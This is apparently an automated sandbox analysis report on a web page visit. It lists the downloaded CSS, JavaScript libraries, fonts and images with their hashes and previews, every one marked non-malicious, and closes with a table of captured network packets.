      MD5:1690997909AAE14B023A6580D4A2F33F
      SHA1:A4FD9551382A3B5C9C43E14ADB8C4C4149CD2352
      SHA-256:92AC508220F5BB60EC94E07650528EB66625F82A4740ADA068CDE05365781286
      SHA-512:617658DBE762B0F4C1A6433C90EA2FE21A0D27D431F00B2B216DE28636066FC4653A23D0B6CCCC53B9ABBD5A234E3416DCB8296B7F0DEE0CEBA1B45CE99A2BCF
      Malicious:false
      Reputation:low
      URL:https://code.ionicframework.com/ionicons/2.0.1/css/ionicons.min.css
      Preview:@charset "UTF-8";/*!. Ionicons, v2.0.1. Created by Ben Sperry for the Ionic Framework, http://ionicons.com/. https://twitter.com/benjsperry https://twitter.com/ionicframework. MIT License: https://github.com/driftyco/ionicons.. Android-style icons originally built by Google.s. Material Design Icons: https://github.com/google/material-design-icons. used under CC BY http://creativecommons.org/licenses/by/4.0/. Modified icons to fit ionicon.s grid from original..*/@font-face{font-family:"Ionicons";src:url("../fonts/ionicons.eot?v=2.0.1");src:url("../fonts/ionicons.eot?v=2.0.1#iefix") format("embedded-opentype"),url("../fonts/ionicons.ttf?v=2.0.1") format("truetype"),url("../fonts/ionicons.woff?v=2.0.1") format("woff"),url("../fonts/ionicons.svg?v=2.0.1#Ionicons") format("svg");font-weight:normal;font-style:normal}.ion,.ionicons,.ion-alert:before,.ion-alert-circled:before,.ion-android-add:before,.ion-android-add-circle:before,.ion-android-alarm-clock:before,.ion-android-alert:
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:ASCII text, with very long lines (65371)
      Category:downloaded
      Size (bytes):122540
      Entropy (8bit):5.095991350869987
      Encrypted:false
      SSDEEP:768:ayPGxw/jc/QWlJxtQZIuiHlncmzI4I8OAduFKbv2ctm2Bm8JP+eckOvS1Fs:Uw/o1wIuiHlncm28lDbzzPux
      MD5:5D5357CB3704E1F43A1F5BFED2AEBF42
      SHA1:08DF9A96752852F2CBD310C30FACD934E348C2C5
      SHA-256:31FBD99641C212A6AD3681A2397BDE13C148C0CCD98385BCE6A7EB7C81417D87
      SHA-512:7537E07BFCE0A0C6293FB41B1F2E2058C106B1BB1D65E097CFB8AB22D8DC0B7B0F505B5FD24B856C3CFF8B11BB02B4F19838CB5C399ECC7B9B78D8A4C8A195C9
      Malicious:false
      Reputation:low
      URL:https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/css/bootstrap.min.css
      Preview:/*!. * Bootstrap v3.3.5 (http://getbootstrap.com). * Copyright 2011-2015 Twitter, Inc.. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). *//*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */html{font-family:sans-serif;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%}body{margin:0}article,aside,details,figcaption,figure,footer,header,hgroup,main,menu,nav,section,summary{display:block}audio,canvas,progress,video{display:inline-block;vertical-align:baseline}audio:not([controls]){display:none;height:0}[hidden],template{display:none}a{background-color:transparent}a:active,a:hover{outline:0}abbr[title]{border-bottom:1px dotted}b,strong{font-weight:700}dfn{font-style:italic}h1{margin:.67em 0;font-size:2em}mark{color:#000;background:#ff0}small{font-size:80%}sub,sup{position:relative;font-size:75%;line-height:0;vertical-align:baseline}sup{top:-.5em}sub{bottom:-.25em}img{border:0}svg:not(:root){overflow:hidden}figure{margin:1em 40px}hr
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:ASCII text, with very long lines (65447)
      Category:dropped
      Size (bytes):89501
      Entropy (8bit):5.289893677458563
      Encrypted:false
      SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
      MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
      SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
      SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
      SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
      Malicious:false
      Reputation:low
      Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:ASCII text, with very long lines (42862)
      Category:dropped
      Size (bytes):42863
      Entropy (8bit):5.085616303270228
      Encrypted:false
      SSDEEP:768:4rkkX123A5YHi6pWzYdlNWYcx16nnYdXRRMd2KYCQCsPShb1ez7RFmYH:EPrYdlNixEePiYH
      MD5:D5A61C749E44E47159AF8A6579DDA121
      SHA1:3B41B3BC956685015A347A2238E71DB29DFA0DBB
      SHA-256:0C7178CC6CA34FB18E30F070A5E7A1C287B2D7CCFCBA2CFDF06E0F46EDA55740
      SHA-512:5ED98CB4311C373DA3EDE92BB47BCE551E22C30683EA8FC55097BAF99ABE1E0702B24DE48F8B9241047CC1E4364158F5A343E4E8FC182E8866DB4E99CCD7EE6E
      Malicious:false
      Reputation:low
      Preview:!function(i){"use strict";"function"==typeof define&&define.amd?define(["jquery"],i):"undefined"!=typeof exports?module.exports=i(require("jquery")):i(jQuery)}(function(i){"use strict";var e=window.Slick||{};(e=function(){var e=0;return function(t,o){var s,n=this;n.defaults={accessibility:!0,adaptiveHeight:!1,appendArrows:i(t),appendDots:i(t),arrows:!0,asNavFor:null,prevArrow:'<button class="slick-prev" aria-label="Previous" type="button">Previous</button>',nextArrow:'<button class="slick-next" aria-label="Next" type="button">Next</button>',autoplay:!1,autoplaySpeed:3e3,centerMode:!1,centerPadding:"50px",cssEase:"ease",customPaging:function(e,t){return i('<button type="button" />').text(t+1)},dots:!1,dotsClass:"slick-dots",draggable:!0,easing:"linear",edgeFriction:.35,fade:!1,focusOnSelect:!1,focusOnChange:!1,infinite:!0,initialSlide:0,lazyLoad:"ondemand",mobileFirst:!1,pauseOnHover:!0,pauseOnFocus:!0,pauseOnDotsHover:!1,respondTo:"window",responsive:null,rows:1,rtl:!1,slide:"",slidesP
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:PNG image data, 500 x 300, 8-bit/color RGB, non-interlaced
      Category:downloaded
      Size (bytes):92738
      Entropy (8bit):7.99422232812937
      Encrypted:true
      SSDEEP:1536:VpjDHHg2WZYCmL2OFd701OGN1rgfnfGZyb0w6bOZ6NYDEx5dYe/H1M5uvbmTbxTQ:VZDHHgJYCvOjwQGN1rKG0f6bOgNYIjyo
      MD5:5C92920FBBF8DD80BDFE113932DB4824
      SHA1:F946FBF2C78D4CBE1D66245E4297A13483F33DCD
      SHA-256:E7CAF044B88B47A1C05531D15317F7764EBE91BBFBCEE89257483526757B3CB3
      SHA-512:437596E0775E16F6C1537CFE26ECDF18EBFE25FE01045E02E133C1FFF7E8A59ED12E05F7F7511D333D770D272FA79F6B1062E879667B99904BD0297A57674D96
      Malicious:false
      Reputation:low
      URL:https://a.m.dana.id/danaweb/promo/1678877820-Thumbnail---DANA-Deals__2_.png
      Preview:.PNG........IHDR.......,............tEXtSoftware.Adobe ImageReadyq.e<..i.IDATx....$W}.zN...===yf'.l......@0X...1F.w.|..m....>s...re?.c.{.....l@.VHB.]P.jW+....N.3=.+.w*vu.....VwU......w...;. ..~..!...s9..}m..j.Y....."[3..c.r.z.4V.g.....{...7..%.?..7.....V ......m.u....6......+..)x_.....]. ...{...<.G.".$(.....A..zH..4s}.%.f.K.....-..G..........4.%..}~:.WJ...Zh.m....w......d....+".wY.f...v|.!...n.tllu.n.w...V....N.../.....<t.........D..3.S.]T.F...#;....A......(.^h...v..`..p...}.y..d.#...Zh.m...%ng @..g..vA#.,J..`..}y..7.........o.]5<O...C.q.?...B.mc,.......E.....*.kR.*.C.~..=....xr...i.qs.F79..[ho..{h...1..H.8x........5.]..@...4@p.fb.D...!.w.5......h8..7..w.....{h..v...0....*.+"..$a|.0}....;.T.{..7......_O...rP.^d..ocm..{h..v..=.6..5?L....2R...i.... ..Y.=..|.....X.z..G...(......f >d...F ;{..]uc..vEE,.....?..!.v/..e?...$.....i..~=..wi....aJ......1Q.".F....XHV.].].8E..a...k5O'.?....<.sv.....( ...a8..!...Zh....e.9....!;....{y..n...p..~
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:PNG image data, 500 x 203, 8-bit colormap, non-interlaced
      Category:downloaded
      Size (bytes):15795
      Entropy (8bit):7.945871114030404
      Encrypted:false
      SSDEEP:192:oRQ1IFHmyqC+3QT6UYf8caxA7RlOgeFWoAOoW9efTuPoSgdznUkHAIhJuz:x1yHmyqryAGxMRMge5v8faPoJr0
      MD5:E698F4D246FAB302A286D1E8EB7049E4
      SHA1:0737BAE7C61E87ED547E4408FF1E7432EDB43F48
      SHA-256:DE9A7B06966C704CC5E8DA25EBA02339E2842A40285E768A99F43D0318740E2A
      SHA-512:5A584D5279D1179473B88ADBEE250BB8AD5094186DC57B20B799D442D46F565F369192DFBA863216EFADBDC4370729E38E37278ECBF4F06C44EB01EF56126596
      Malicious:false
      Reputation:low
      URL:https://i.ibb.co/C1f1Y0C/logo-lps.png
      Preview:.PNG........IHDR..............S.t....gAMA......a.....sRGB.........pHYs...#...#.x.?v....PLTEGpL``b``b..4``b__b``b``b``b__a..4..4..4ccdaac..3..4__a``b``b``b__a^^a``b..4``a``b``c..4__a``b``a``b``b``b__a``b]]___b``b``b``a``b__b``b``b``b``b_____b..4^^_``b``b``b``b^^b``a``b..4``a``b``a__a__a``b``b__a``b``b``b__a``a__b`````b^^`^^`__a__b__b``b``b``b``a``b``b``b^^___b``b]]_``b^^a..4__a``b``b``b``b.1__b__a..5..4``b__a``a``b__b__`__a..4]]_..3__a..4``b.3.2``b``b..3..3..4^^a..4``b``b..3..3..3..3..3.3``b..4..4..4``b``b..3..4__a``b``b__b``b``b__a..4.2..4..4.2^^a``a..3..3..4..3``b..4..3..4..4..4..3..4..4``b__a..3..3..3..4.2..4..3..3.3__a__b``b..4..4..3..3..3..4..3..3..4..4.1__a__a..4.3..4..3..4..4..3..3.3..3.2__a__b..4.2__a``b__aSSY``a``b``b.3..3..4..3..3__a.2LLV..4..3..3..3``b..4..4..4..4..4..4..4..3.3..4``b.3__a__a__b..4..,__a`````a]]_``b..4``b:.......tRNS.....................SG........?...Kc.<.1.q.h.....#..D.7@..^H.V.[o,....!M$...9k...C....t.....f...w&...a...*..@3..&..hO...
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v90), quality = 60", baseline, precision 8, 800x400, components 3
      Category:dropped
      Size (bytes):15204
      Entropy (8bit):7.491901755017311
      Encrypted:false
      SSDEEP:384:jQOpvZa1++sYM9LZ1tdvD/9q/SCDrSoEqylQvTqUDkv6HRN:jv0Hin/79qRDO/qylYWyRN
      MD5:5B4C53E371CCA02958635D6D238573D7
      SHA1:99FB84123E571C464E893EDAA9267B91BFF9016F
      SHA-256:834393EFF4FA38375ADF7ED072DA77BE07B7D1769804C43533136924CD4E613F
      SHA-512:355094CD914081268E89CAAF918BFFAA14BD91F6B2CC3C663DD523DC2982B7D8B09E58E12DA008B57027902BF848A23D7F6E2C8DF486AA3DB0E6FF906EE558A8
      Malicious:false
      Reputation:low
      Preview:......JFIF.....`.`.....;CREATOR: gd-jpeg v1.0 (using IJG JPEG v90), quality = 60....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO........ .."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(.
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:ASCII text, with very long lines (65451)
      Category:dropped
      Size (bytes):89476
      Entropy (8bit):5.2896589255084425
      Encrypted:false
      SSDEEP:1536:AjExXUqrnxDjoXEZxkMV4SYSt0zvDD6ip3h8cApwEjOPrBeU6QLiTFbc0QlQvakF:AYh8eip3huuf6IidlrvakdtQ47GK1
      MD5:DC5E7F18C8D36AC1D3D4753A87C98D0A
      SHA1:C8E1C8B386DC5B7A9184C763C88D19A346EB3342
      SHA-256:F7F6A5894F1D19DDAD6FA392B2ECE2C5E578CBF7DA4EA805B6885EB6985B6E3D
      SHA-512:6CB4F4426F559C06190DF97229C05A436820D21498350AC9F118A5625758435171418A022ED523BAE46E668F9F8EA871FEAB6AFF58AD2740B67A30F196D65516
      Malicious:false
      Reputation:low
      Preview:/*! jQuery v3.5.1 | (c) JS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"o
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:Web Open Font Format (Version 2), TrueType, length 18720, version 1.0
      Category:downloaded
      Size (bytes):18720
      Entropy (8bit):7.9898266266717926
      Encrypted:false
      SSDEEP:384:/e1h2vOnJLuxUNneyZmiU72RGsdLqK2+gFxVVZV2XCT:kEvOnYxU/miU72RHLK5iw
      MD5:D26A2372AA87EA24DF867BE03821FC5F
      SHA1:5DEA98349DCF3E2DA8A4C4C209BBCF412D572805
      SHA-256:1F6E5AE697330D08ACADF0299418B94A102DCC63F483B3F3EC821CC7E36EF8DC
      SHA-512:A612279A2530C901A1AB8D6E3346172ABA48855E8348493F09F5A4DEAA2E90DD15E014C8FF82F712DF2C512B16D379E709DAB6C4E7242BD84BAC189801C67EAB
      Malicious:false
      Reputation:low
      URL:https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjr0B4gaVI.woff2
      Preview:wOF2......I .......8..H..........................|.."..h.`?STATZ..0..|...........=..2..6.$..`. ...........z%.Q....P}.\Q.M..Q......m.....*c.."./.B!,PV..I.a......t....M8....H..q.(#@4..|.....:.=+..w...'.....2..h..i....o.Xh.u......t,..a(..m~....Sy..O..NG....8Bc....]...!.Q..X4.R%-;.;..l.........X.%...N..C.4.C4T=..":..,..:gN11.1....V.A.EAA.#..cb.6...........G..P*z=)(....[...w...........`...ZBrF&...X.K.V.[|.}U..)m\..0l.l..9j.*RM...FX.{...u..Z6.Y7...J......}~ P..,.t..'m.Ei....{a..3 ;!. .].....5K.C.. ........0`...P....S...s.<.{..s.....MI.m.|@...@....4.)c...~..wF`x.k..7}RU"...I..N.....3...J....>o...W..b...../.Q3 ...o.....?'..VuUIU8@....v..)mR`RD.$..J1.z.uu....Z..I....c/....z......UN......}..../{V`.....i%....H..c.'.d/.....*H.T..hRbS.-.K.T.M...W..8u..R.1.........z.'V...D.:..PL(.X...cJ..c.E!..gi.VT@.+.......BO...$;.}.S.Vm.u. ]0v...L.&...$n.*.V..k..u.=q=.z.\.:M0.Z ....p..1..q....K....12.n.Y.Ep.L[..7.`.J `.7.v......[p.y8..-.b.I.*.t......a.vf.f....Fk/.%t..
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:ASCII text, with very long lines (65293)
      Category:downloaded
      Size (bytes):79742
      Entropy (8bit):5.18245217940784
      Encrypted:false
      SSDEEP:1536:2JC+tkTbR2t4i+AitLJLr2gykHgWskGvD/mZLwoZ0ea1sJBTR:suBQkGjmZLwoZ0eisV
      MD5:6DAE88ABA81E468737C510CC2E4EC1DD
      SHA1:6B4B985A90ABD7AB1C2E35FF3B874D07CF8410EE
      SHA-256:2515E37EEE31F5EF3D659B21DCC84DC6EA732B06872DA51078B5B526DE34C0C1
      SHA-512:9DDAEB47DE0F5B7724680BEF5AB033462E495A317BD7F3F0ED3952A3A8EE74034E1429B3D1DFB4604FAA2066A64514A75734AF2321ACE014EDC85326DCC4FF72
      Malicious:false
      Reputation:low
      URL:https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/js/bootstrap.bundle.min.js
      Preview:/*!. * Bootstrap v5.2.0-beta1 (https://getbootstrap.com/). * Copyright 2011-2022 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define(e):(t="undefined"!=typeof globalThis?globalThis:t||self).bootstrap=e()}(this,(function(){"use strict";const t="transitionend",e=t=>{let e=t.getAttribute("data-bs-target");if(!e||"#"===e){let i=t.getAttribute("href");if(!i||!i.includes("#")&&!i.startsWith("."))return null;i.includes("#")&&!i.startsWith("#")&&(i=`#${i.split("#")[1]}`),e=i&&"#"!==i?i.trim():null}return e},i=t=>{const i=e(t);return i&&document.querySelector(i)?i:null},n=t=>{const i=e(t);return i?document.querySelector(i):null},s=e=>{e.dispatchEvent(new Event(t))},o=t=>!(!t||"object"!=typeof t)&&(void 0!==t.jquery&&(t=t[0]),void 0!==t.nodeType),r=t=>o(t)?t
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v90), quality = 60", baseline, precision 8, 800x400, components 3
      Category:downloaded
      Size (bytes):15204
      Entropy (8bit):7.491901755017311
      Encrypted:false
      SSDEEP:384:jQOpvZa1++sYM9LZ1tdvD/9q/SCDrSoEqylQvTqUDkv6HRN:jv0Hin/79qRDO/qylYWyRN
      MD5:5B4C53E371CCA02958635D6D238573D7
      SHA1:99FB84123E571C464E893EDAA9267B91BFF9016F
      SHA-256:834393EFF4FA38375ADF7ED072DA77BE07B7D1769804C43533136924CD4E613F
      SHA-512:355094CD914081268E89CAAF918BFFAA14BD91F6B2CC3C663DD523DC2982B7D8B09E58E12DA008B57027902BF848A23D7F6E2C8DF486AA3DB0E6FF906EE558A8
      Malicious:false
      Reputation:low
      URL:https://i.ibb.co/fpXTF6b/danaa-4lt.jpg
      Preview:......JFIF.....`.`.....;CREATOR: gd-jpeg v1.0 (using IJG JPEG v90), quality = 60....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO........ .."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(.
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:ASCII text, with very long lines (1572)
      Category:downloaded
      Size (bytes):5996
      Entropy (8bit):5.419775834780032
      Encrypted:false
      SSDEEP:96:ZOXbaAJOXba4FZ8OXbaPkOXbaZYOXba3OXbaMyhZcyJzV+zmnWOXbaHubqGIFuYa:xAhX8Z4XMuyzObqGIwY0mP3W
      MD5:36D9E88C21981CAA4AD05669A090FC5B
      SHA1:5993B11F8169BF6DEFEAC7AD5C2029F0316CE549
      SHA-256:BFE6E4D01A3D97686E49BDA1FCD4DA4FA9746DCD72B122480E2C950216DEC085
      SHA-512:602FA976F73EA4829E0DE57C48C432B01F7A2B825D0A9C52E3ED760533074F32D541DA95630343C50240A5456E6EED1B986D85B3390787684CAC5AFB97D0A96D
      Malicious:false
      Reputation:low
      URL:https://fonts.googleapis.com/css2?family=Open+Sans:wght@500&display=swap
      Preview:/* cyrillic-ext */.@font-face {. font-family: 'Open Sans';. font-style: normal;. font-weight: 500;. font-stretch: 100%;. font-display: swap;. src: url(https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjr0B4taVIGxA.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Open Sans';. font-style: normal;. font-weight: 500;. font-stretch: 100%;. font-display: swap;. src: url(https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjr0B4kaVIGxA.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* greek-ext */.@font-face {. font-family: 'Open Sans';. font-style: normal;. font-weight: 500;. font-stretch: 100%;. font-display: swap;. src: url(https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjr0B4saVIGxA.woff2) for
      No static file info

      Download Network PCAP: filteredfull

      • Total Packets: 600
      • 443 (HTTPS)
      • 80 (HTTP)
      • 53 (DNS)
      TimestampSource PortDest PortSource IPDest IP
      Sep 27, 2024 04:26:26.041719913 CEST49674443192.168.2.6173.222.162.64
      Sep 27, 2024 04:26:26.041719913 CEST49673443192.168.2.6173.222.162.64
      Sep 27, 2024 04:26:26.354183912 CEST49672443192.168.2.6173.222.162.64
      Sep 27, 2024 04:26:35.680628061 CEST49673443192.168.2.6173.222.162.64
      Sep 27, 2024 04:26:35.756758928 CEST49674443192.168.2.6173.222.162.64
      Sep 27, 2024 04:26:36.087148905 CEST49672443192.168.2.6173.222.162.64
      Sep 27, 2024 04:26:36.458154917 CEST4970480192.168.2.652.58.254.253
      Sep 27, 2024 04:26:36.458297968 CEST4970580192.168.2.652.58.254.253
      Sep 27, 2024 04:26:36.463080883 CEST804970452.58.254.253192.168.2.6
      Sep 27, 2024 04:26:36.463138103 CEST804970552.58.254.253192.168.2.6
      Sep 27, 2024 04:26:36.463239908 CEST4970480192.168.2.652.58.254.253
      Sep 27, 2024 04:26:36.464027882 CEST4970580192.168.2.652.58.254.253
      Sep 27, 2024 04:26:36.464027882 CEST4970580192.168.2.652.58.254.253
      Sep 27, 2024 04:26:36.468899012 CEST804970552.58.254.253192.168.2.6
      Sep 27, 2024 04:26:37.082736015 CEST804970552.58.254.253192.168.2.6
      Sep 27, 2024 04:26:37.094563961 CEST49706443192.168.2.63.70.101.28
      Sep 27, 2024 04:26:37.094608068 CEST443497063.70.101.28192.168.2.6
      Sep 27, 2024 04:26:37.094702005 CEST49706443192.168.2.63.70.101.28
      Sep 27, 2024 04:26:37.094897985 CEST49706443192.168.2.63.70.101.28
      Sep 27, 2024 04:26:37.094916105 CEST443497063.70.101.28192.168.2.6
      Sep 27, 2024 04:26:37.133502960 CEST4970580192.168.2.652.58.254.253
      Sep 27, 2024 04:26:37.631088018 CEST44349698173.222.162.64192.168.2.6
      Sep 27, 2024 04:26:37.631190062 CEST49698443192.168.2.6173.222.162.64
      Sep 27, 2024 04:26:37.737611055 CEST443497063.70.101.28192.168.2.6
      Sep 27, 2024 04:26:37.738797903 CEST49706443192.168.2.63.70.101.28
      Sep 27, 2024 04:26:37.738811016 CEST443497063.70.101.28192.168.2.6
      Sep 27, 2024 04:26:37.739934921 CEST443497063.70.101.28192.168.2.6
      Sep 27, 2024 04:26:37.740001917 CEST49706443192.168.2.63.70.101.28
      Sep 27, 2024 04:26:37.746445894 CEST49706443192.168.2.63.70.101.28
      Sep 27, 2024 04:26:37.746582985 CEST443497063.70.101.28192.168.2.6
      Sep 27, 2024 04:26:37.747483969 CEST49706443192.168.2.63.70.101.28
      Sep 27, 2024 04:26:37.747492075 CEST443497063.70.101.28192.168.2.6
      Sep 27, 2024 04:26:37.789722919 CEST49706443192.168.2.63.70.101.28
      Sep 27, 2024 04:26:38.466953039 CEST443497063.70.101.28192.168.2.6
      Sep 27, 2024 04:26:38.466994047 CEST443497063.70.101.28192.168.2.6
      Sep 27, 2024 04:26:38.467051029 CEST49706443192.168.2.63.70.101.28
      Sep 27, 2024 04:26:38.467066050 CEST443497063.70.101.28192.168.2.6
      Sep 27, 2024 04:26:38.467106104 CEST49706443192.168.2.63.70.101.28
      Sep 27, 2024 04:26:38.467597961 CEST443497063.70.101.28192.168.2.6
      Sep 27, 2024 04:26:38.467649937 CEST49706443192.168.2.63.70.101.28
      Sep 27, 2024 04:26:38.556979895 CEST443497063.70.101.28192.168.2.6
      Sep 27, 2024 04:26:38.557064056 CEST49706443192.168.2.63.70.101.28
      Sep 27, 2024 04:26:38.557079077 CEST443497063.70.101.28192.168.2.6
      Sep 27, 2024 04:26:38.557183981 CEST443497063.70.101.28192.168.2.6
      Sep 27, 2024 04:26:38.557239056 CEST49706443192.168.2.63.70.101.28
      Sep 27, 2024 04:26:38.685180902 CEST49706443192.168.2.63.70.101.28
      Sep 27, 2024 04:26:38.685206890 CEST443497063.70.101.28192.168.2.6
      Sep 27, 2024 04:26:38.689898014 CEST49710443192.168.2.6151.101.129.229
      Sep 27, 2024 04:26:38.689898014 CEST49709443192.168.2.6104.18.11.207
      Sep 27, 2024 04:26:38.689965963 CEST44349710151.101.129.229192.168.2.6
      Sep 27, 2024 04:26:38.689996004 CEST44349709104.18.11.207192.168.2.6
      Sep 27, 2024 04:26:38.690085888 CEST49710443192.168.2.6151.101.129.229
      Sep 27, 2024 04:26:38.690085888 CEST49709443192.168.2.6104.18.11.207
      Sep 27, 2024 04:26:38.692167044 CEST49711443192.168.2.6151.101.129.229
      Sep 27, 2024 04:26:38.692225933 CEST49712443192.168.2.6172.67.69.29
      Sep 27, 2024 04:26:38.692254066 CEST44349711151.101.129.229192.168.2.6
      Sep 27, 2024 04:26:38.692327976 CEST44349712172.67.69.29192.168.2.6
      Sep 27, 2024 04:26:38.692751884 CEST49712443192.168.2.6172.67.69.29
      Sep 27, 2024 04:26:38.692751884 CEST49711443192.168.2.6151.101.129.229
      Sep 27, 2024 04:26:38.696913958 CEST49713443192.168.2.6151.101.129.229
      Sep 27, 2024 04:26:38.696949959 CEST44349713151.101.129.229192.168.2.6
      Sep 27, 2024 04:26:38.697130919 CEST49713443192.168.2.6151.101.129.229
      Sep 27, 2024 04:26:38.709846973 CEST49716443192.168.2.6151.101.129.229
      Sep 27, 2024 04:26:38.709861040 CEST44349716151.101.129.229192.168.2.6
      Sep 27, 2024 04:26:38.710058928 CEST49716443192.168.2.6151.101.129.229
      Sep 27, 2024 04:26:38.710726023 CEST49717443192.168.2.63.70.101.28
      Sep 27, 2024 04:26:38.710747004 CEST443497173.70.101.28192.168.2.6
      Sep 27, 2024 04:26:38.711261988 CEST49710443192.168.2.6151.101.129.229
      Sep 27, 2024 04:26:38.711293936 CEST44349710151.101.129.229192.168.2.6
      Sep 27, 2024 04:26:38.711325884 CEST49717443192.168.2.63.70.101.28
      Sep 27, 2024 04:26:38.713852882 CEST49718443192.168.2.665.9.66.56
      Sep 27, 2024 04:26:38.713886976 CEST4434971865.9.66.56192.168.2.6
      Sep 27, 2024 04:26:38.713995934 CEST49718443192.168.2.665.9.66.56
      Sep 27, 2024 04:26:38.714267969 CEST49709443192.168.2.6104.18.11.207
      Sep 27, 2024 04:26:38.714294910 CEST44349709104.18.11.207192.168.2.6
      Sep 27, 2024 04:26:38.714765072 CEST49711443192.168.2.6151.101.129.229
